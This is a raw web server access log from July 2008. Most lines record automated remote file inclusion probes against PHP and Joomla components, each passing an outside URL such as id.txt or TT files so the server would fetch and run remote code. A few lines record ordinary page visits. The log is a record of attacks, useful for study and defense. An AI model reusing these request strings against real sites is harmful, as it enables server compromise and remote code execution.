72.18.152.53 - - [14/Jul/2008:19:00:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.18.152.53 - - [14/Jul/2008:19:00:25 -0500] "GET //skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.203.228.120 - - [14/Jul/2008:19:00:27 -0500] "GET /logs//login.php?dir=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
213.203.228.120 - - [14/Jul/2008:19:00:27 -0500] "GET //login.php?dir=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
207.210.69.188 - - [14/Jul/2008:19:00:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
207.210.69.188 - - [14/Jul/2008:19:00:34 -0500] "GET //skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
62.75.136.116 - - [14/Jul/2008:19:01:17 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
62.75.136.116 - - [14/Jul/2008:19:01:18 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
70.86.99.34 - - [14/Jul/2008:19:05:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
70.86.99.34 - - [14/Jul/2008:19:05:40 -0500] "GET //skin/zero_vote/error.php?dir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
217.110.54.240 - - [14/Jul/2008:19:07:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
217.110.54.240 - - [14/Jul/2008:19:07:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.130.15 - - [14/Jul/2008:19:14:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
77.221.130.15 - - [14/Jul/2008:19:14:13 -0500] "GET //skin/zero_vote/error.php?dir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.130.15 - - [14/Jul/2008:19:18:08 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
77.221.130.15 - - [14/Jul/2008:19:18:09 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
74.6.18.252 - - [14/Jul/2008:19:21:35 -0500] "GET /logs/access_log.1158192000 HTTP/1.0" 200 296089 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.119.200.248 - - [14/Jul/2008:19:23:55 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
87.119.200.248 - - [14/Jul/2008:19:23:55 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
87.119.200.248 - - [14/Jul/2008:19:23:56 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.102.21.197 - - [14/Jul/2008:19:28:02 -0500] "GET /logs/main.php?sit=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:28:02 -0500] "GET /logs/main.php?sit=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:28:02 -0500] "GET /main.php?sit=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:28:02 -0500] "GET /main.php?sit=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
194.151.202.2 - - [14/Jul/2008:19:32:06 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
194.151.202.2 - - [14/Jul/2008:19:32:06 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
194.151.202.2 - - [14/Jul/2008:19:32:06 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://lizartdisplay.com/di?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.102.21.197 - - [14/Jul/2008:19:34:01 -0500] "GET /logs//?p=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 200 91388 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:34:01 -0500] "GET /logs//?p=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 91388 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:34:01 -0500] "GET //?p=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:19:34:01 -0500] "GET //?p=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
208.111.154.101 - - [14/Jul/2008:19:37:48 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://www.topiccraze.com/topic?topic=history;id=1163;prvw;w=_r""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [14/Jul/2008:19:37:49 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [14/Jul/2008:19:37:49 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.101 - - [14/Jul/2008:19:37:49 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
222.73.48.200 - - [14/Jul/2008:19:43:43 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
222.73.48.200 - - [14/Jul/2008:19:43:44 -0500] "GET //include/admin.lib.inc.php?site_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
74.6.18.252 - - [14/Jul/2008:19:47:26 -0500] "GET /logs/access_log.1206403200 HTTP/1.0" 200 275345 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.18.81.164 - - [14/Jul/2008:19:50:27 -0500] "GET /logs//poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
85.18.81.164 - - [14/Jul/2008:19:50:27 -0500] "GET /logs//phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
85.18.81.164 - - [14/Jul/2008:19:50:27 -0500] "GET //phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
85.18.81.164 - - [14/Jul/2008:19:50:27 -0500] "GET //poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
75.125.40.130 - - [14/Jul/2008:19:54:52 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:19:54:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
217.79.181.37 - - [14/Jul/2008:19:58:39 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://194.169.192.121/.../help.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.69"
217.79.181.37 - - [14/Jul/2008:19:58:39 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://194.169.192.121/.../help.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.69"
68.115.151.250 - - [14/Jul/2008:20:04:50 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
68.115.151.250 - - [14/Jul/2008:20:04:51 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
68.115.151.250 - - [14/Jul/2008:20:04:51 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
68.115.151.250 - - [14/Jul/2008:20:04:51 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
68.115.151.250 - - [14/Jul/2008:20:04:51 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
68.115.151.250 - - [14/Jul/2008:20:04:51 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QS 4.1.2.2)"
81.169.134.72 - - [14/Jul/2008:20:11:09 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
81.169.134.72 - - [14/Jul/2008:20:11:09 -0500] "GET //?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
81.169.134.72 - - [14/Jul/2008:20:11:10 -0500] "GET /logs//?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 200 91388 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:20:12:14 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:20:12:14 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.169.142.172 - - [14/Jul/2008:20:14:39 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://194.169.192.121/.../help.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
81.169.142.172 - - [14/Jul/2008:20:14:40 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://194.169.192.121/.../help.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.198.175.18 - - [14/Jul/2008:20:16:46 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
91.198.175.18 - - [14/Jul/2008:20:16:46 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
74.52.114.58 - - [14/Jul/2008:20:21:29 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
74.52.114.58 - - [14/Jul/2008:20:21:29 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
74.52.114.58 - - [14/Jul/2008:20:21:29 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.52.114.58 - - [14/Jul/2008:20:21:29 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
77.221.157.210 - - [14/Jul/2008:20:23:15 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
77.221.157.210 - - [14/Jul/2008:20:23:15 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
64.18.142.194 - - [14/Jul/2008:20:24:29 -0500] "GET //?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
64.18.142.194 - - [14/Jul/2008:20:24:29 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
64.18.142.194 - - [14/Jul/2008:20:24:30 -0500] "GET /logs//?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 200 91388 "-""libwww-perl/5.811"
59.126.172.166 - - [14/Jul/2008:20:26:54 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
59.126.172.166 - - [14/Jul/2008:20:26:55 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
12.108.68.3 - - [14/Jul/2008:20:27:20 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
12.108.68.3 - - [14/Jul/2008:20:27:21 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
77.72.200.194 - - [14/Jul/2008:20:27:23 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
77.72.200.194 - - [14/Jul/2008:20:27:24 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
75.102.21.197 - - [14/Jul/2008:20:28:18 -0500] "GET /logs/start.php?s=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:28:18 -0500] "GET /logs/start.php?s=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:28:18 -0500] "GET /start.php?s=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:28:19 -0500] "GET /start.php?s=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
201.116.50.181 - - [14/Jul/2008:20:28:21 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
64.185.237.137 - - [14/Jul/2008:20:28:21 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.185.237.137 - - [14/Jul/2008:20:28:22 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ebo.fr/IMG/motoon24.jpg? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
201.116.50.181 - - [14/Jul/2008:20:28:23 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
212.241.217.176 - - [14/Jul/2008:20:29:08 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
212.241.217.176 - - [14/Jul/2008:20:29:08 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
66.98.250.45 - - [14/Jul/2008:20:32:32 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
66.98.250.45 - - [14/Jul/2008:20:32:32 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.leokaris.com/bajo.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
201.55.48.7 - - [14/Jul/2008:20:33:55 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.55.48.7 - - [14/Jul/2008:20:33:55 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
190.54.28.163 - - [14/Jul/2008:20:35:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
190.54.28.163 - - [14/Jul/2008:20:35:11 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.84.145.165 - - [14/Jul/2008:20:37:55 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
213.238.52.61 - - [14/Jul/2008:20:39:38 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:20:39:38 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
194.143.183.8 - - [14/Jul/2008:20:41:06 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
194.143.183.8 - - [14/Jul/2008:20:41:07 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
81.169.134.72 - - [14/Jul/2008:20:41:11 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://tropojani.tiranaweb.net/forumi/Packages/oh.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
59.120.32.19 - - [14/Jul/2008:20:41:29 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
59.120.32.19 - - [14/Jul/2008:20:41:30 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
217.13.86.112 - - [14/Jul/2008:20:44:32 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
217.13.86.112 - - [14/Jul/2008:20:44:32 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
75.125.40.130 - - [14/Jul/2008:20:45:05 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:20:45:05 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:20:54:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:20:54:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:57:16 -0500] "GET /logs/main.php5?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:57:16 -0500] "GET /logs/main.php5?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:57:16 -0500] "GET /main.php5?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
75.102.21.197 - - [14/Jul/2008:20:57:16 -0500] "GET /main.php5?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:20:57:19 -0500] "GET /logs/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
75.125.40.130 - - [14/Jul/2008:20:57:19 -0500] "GET /path/components/com_facileforms/facileforms.frame.php?ff_compath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
62.213.79.186 - - [14/Jul/2008:20:57:26 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
62.213.79.186 - - [14/Jul/2008:20:57:38 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
62.213.79.186 - - [14/Jul/2008:20:59:17 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
62.213.79.186 - - [14/Jul/2008:20:59:29 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
212.160.134.131 - - [14/Jul/2008:21:01:56 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
212.160.134.131 - - [14/Jul/2008:21:01:57 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
217.110.54.240 - - [14/Jul/2008:21:08:01 -0500] "GET /logs/index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.110.54.240 - - [14/Jul/2008:21:08:02 -0500] "GET /index2.php?x=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:09:49 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
201.116.50.181 - - [14/Jul/2008:21:09:52 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.213.79.186 - - [14/Jul/2008:21:12:30 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
62.213.79.186 - - [14/Jul/2008:21:12:32 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gibraltarnewsonline.com/advanced_poll/idosi.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
213.238.52.61 - - [14/Jul/2008:21:12:33 -0500] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.238.52.61 - - [14/Jul/2008:21:12:33 -0500] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
217.110.54.240 - - [14/Jul/2008:21:13:38 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
